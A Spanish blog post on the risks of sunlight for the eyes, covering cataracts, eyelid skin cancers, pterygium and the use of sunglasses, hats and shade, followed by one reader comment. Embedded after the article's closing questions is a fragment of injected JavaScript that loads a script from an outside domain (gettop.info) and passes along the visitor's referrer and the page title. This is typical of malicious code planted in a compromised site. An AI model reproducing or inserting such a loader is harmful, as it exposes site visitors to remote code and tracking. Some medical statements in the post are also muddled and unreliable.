Salud y belleza » Enfermedades, Salud

Los riesgos del sol para la vista

1 Comentario

sol-vistaEl sol puede tener consecuencias muy perjudiciales para nuestra vista a largo plazo. Según los expertos, puede producir cataratas, tumores, quemaduras, retinitis… Todos estas secuelas se pueden producir cuando no protegemos adecuadamente nuestros ojos de las radiaciones solares.

Es importante proteger la vista de los rayos UV, sobre todo desde que existen agujeros en la capa de ozono que hacen penetrar muchos más rayos perjudiciales. Es importante protegerse los ojos y la piel en verano, pero el riesgo es latente durante todo el año por lo que no hay que despistarse.

Las zonas más afectadas suelen ser los párpados y la órbita ocular donde suelen aparecer cánceres de piel. De ellos se detectan más de dos millones de casos al año según la Organización Mundial de la Salud (OMS). Suelen ser tumores benignos, por lo que resulta difícil de diagnosticar. Desde que vemos la primera verruga o deformidad se debe acudir al médico porque aunque pueda parecer benigna si se propaga resultará muy grave.

Los rayos UV también pueden causar retinosis y el Pterigión, que es un trastorno que hace crecer el tejido de la conjuntiva sobre la córnea.

piscina-sin-sombraTodas estas enfermedades se podrían evitar de algún modo si, por ejemplo, hubiera más sombras en la piscina, puesto que más de la mitad de ellas no tienen espacios suficientes con sombra. También se recomienda el uso de gafas de sol adecuadas y cerradas por la sien para protegerse del sol, sombreros o gorras y además aplicarse crema protectora también alrededor de los ojos.

¿Tienes algún problema de vista causado por el sol? ¿Sueles proteger tus ojos de las radiaciones solares?}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Inma said:

    Yo uso gafas normales y cuando llevo las de sol no están graduadas. Hay algún problema con eso? veo bien pero no se si es perjudicial para la vista.
    Gracias.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.